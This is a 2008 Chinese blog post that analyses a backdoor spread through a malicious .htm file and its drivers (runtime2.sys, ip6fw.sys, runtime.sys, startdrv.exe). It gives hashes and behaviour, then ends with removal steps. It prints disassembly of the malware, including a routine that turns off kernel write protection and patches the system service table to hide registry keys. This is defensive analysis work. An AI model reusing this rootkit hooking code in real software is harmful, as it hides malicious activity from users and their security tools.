半驱动后门s_126_0(1).htm 部分分析

于 2008-06-09 13:20:00 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: attributes 通讯 file xp google 磁盘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iiprogram/article/details/2526722
本文深入分析了一种恶意软件的技术细节,包括文件隐藏、注册表Rootkit等手段,并介绍了该恶意软件如何通过修改系统服务实现其目的。此外,还提供了一种微点清除方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

File: s_126_0(1).htm
Size: 103944
MD5:      03F280ED4954EBD13845B565430512C8
MZ头经过特殊修改,纠正后Size: 103940,释放驱动runtime2.sys,创建同名符号连接
Click here to open new window CTRL+Mouse wheel to zoom in/out

Click here to open new window CTRL+Mouse wheel to zoom in/out

File: runtime2.sys
Size: 35328
MD5:      6EFD54265E8CA123ADB4CA119427A8E7
1、修改ZwOpenFile系统服务的地址实现文件隐藏
2、判断操作系统版本号是否为2000、XP、2003

.text:000105E2 ; Attributes: bp-based frame
.text:000105E2
.text:000105E2 sub_105E2           proc near                   ; CODE XREF: NotifyRoutine+D p
.text:000105E2
.text:000105E2 arg_0               = dword ptr      8
.text:000105E2 arg_4               = dword ptr      0Ch
.text:000105E2
.text:000105E2                     mov         edi, edi
.text:000105E4                     push        ebp
.text:000105E5                     mov         ebp, esp
.text:000105E7                     mov         eax, ds:NtBuildNumber
.text:000105EC                     movsx       eax, word ptr [eax]
.text:000105EF                     cmp         eax, 893h
.text:000105F4                     push        esi
.text:000105F5                     jz          loc_106A1
.text:000105F5
.text:000105FB                     cmp         eax, 0A28h
.text:00010600                     jz          short loc_10665
.text:00010600
.text:00010602                     cmp         eax, 0ECEh
.text:00010607                     jnz         loc_106E2

3、调用ZwCreateFile、ZwWriteFile创建文件SystemRoot/Temp/startdrv.exe

mov         edi, edi
push        ebp
mov         ebp, esp
sub         esp, 28h
push        esi
push        [ebp+Handle]        ; SourceString
lea         eax, [ebp+DestinationString]
push        eax                 ; DestinationString
call        ds:RtlInitUnicodeString
xor         esi, esi
push        esi                 ; EaLength
push        esi                 ; EaBuffer
push        60h                 ; CreateOptions
push        3                   ; CreateDisposition
push        1                   ; ShareAccess
push        80h                 ; FileAttributes
lea         eax, [ebp+DestinationString]
mov         [ebp+ObjectAttributes.ObjectName], eax
push        esi                 ; AllocationSize
lea         eax, [ebp+IoStatusBlock]
push        eax                 ; IoStatusBlock
lea         eax, [ebp+ObjectAttributes]
push        eax                 ; ObjectAttributes
push        40100000h           ; DesiredAccess
lea         eax, [ebp+Handle]
push        eax                 ; FileHandle
mov         [ebp+ObjectAttributes.Length], 18h
mov         [ebp+ObjectAttributes.RootDirectory], esi
mov         [ebp+ObjectAttributes.Attributes], 240h
mov         [ebp+ObjectAttributes.SecurityDescriptor], esi
mov         [ebp+ObjectAttributes.SecurityQualityOfService], esi
call        ds:ZwCreateFile
cmp         eax, esi
jl          short loc_108BF

4、调用ZwOpenKey、ZwSetValueKey、ZwCreateKey创建驱动注册表键值实现跳过最后一次正确配置且加载入安全模式(代码太长,略!)

5、取磁盘对象类型挂FSD,再次实现文件隐藏

6、修改系统服务分发表实现注册表rootkit


; Attributes: bp-based frame

sub_1286E proc near

var_4= dword ptr -4

mov         edi, edi
push        ebp
mov         ebp, esp
push        ecx
cli
mov         eax, cr0
mov         [ebp+var_4], eax
and         eax, 0FFFEFFFFh
mov         cr0, eax
mov         ecx, ds:KeServiceDescriptorTable
mov         ecx, [ecx]
mov         eax, ds:ZwOpenKey
mov         eax, [eax+1]
mov         dword ptr [ecx+eax*4], offset loc_12192
mov         ecx, ds:KeServiceDescriptorTable
mov         ecx, [ecx]
mov         eax, ds:ZwEnumerateKey
mov         eax, [eax+1]
mov         dword ptr [ecx+eax*4], offset loc_1224A
mov         ecx, ds:KeServiceDescriptorTable
mov         ecx, [ecx]
mov         eax, ds:ZwEnumerateValueKey
mov         eax, [eax+1]
mov         dword ptr [ecx+eax*4], offset loc_12412
mov         ecx, ds:KeServiceDescriptorTable
mov         ecx, [ecx]
mov         eax, ds:ZwSetValueKey
mov         eax, [eax+1]
mov         dword ptr [ecx+eax*4], offset loc_125DA
mov         ecx, ds:KeServiceDescriptorTable
mov         eax, ds:ZwDeleteValueKey
mov         eax, [eax+1]
mov         ecx, [ecx]
mov         dword ptr [ecx+eax*4], offset loc_12730
mov         eax, [ebp+var_4]
mov         cr0, eax
sti
leave
retn
sub_1286E endp

File: STARTDRV.EXE
Size: 20992
MD5:      E848A7316C8F8C502EB3BD370E456E2A

释放驱动ip6fw.sys替换XP墙驱动、释放runtime.sys,后台开启IE连接一个google的空间(忘了,好像还有SMTP)
Click here to open new window CTRL+Mouse wheel to zoom in/out
Click here to open new window CTRL+Mouse wheel to zoom in/out

File: ip6fw.sys
Size: 29056
MD5:      281486D13A98744ACE4C478E555E30B6

1、创建符号连接Restore与NDIS.sys实现通讯
2、查询系统信息查找系统执行体ntoskrnl.exe、ntkrnlpa.exe、ntkrnlmp.exe、ntkrpamp.exe,不放过任何硬件平台(CPU)
3、取操作系统版本(2000、XP、2003)获取系统服务个数,创建系统服务描述符表替换所有系统服务


File: runtime.sys
Size: 5504
MD5:      9F46A485B86CAAFB1910B05010E2E7CC

创建同名符号连接配合ip6fw.sys阻断Tcpip通讯,实现底层挂钩SPI,所以中此病毒者计算机所有通过TCPIP协议进行内部通讯的软件都会受到阻碍。

微点清除方法:
中毒后在运行微点可能会发生通讯受阻的问题,重启计算机后微点自动删除病毒驱动runtime.sys,删除ip6fw.sys后dllcache会自动还原系统默认驱动,微点的可疑文件扫描可以手删runtime2的启动项,然后重启计算机,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值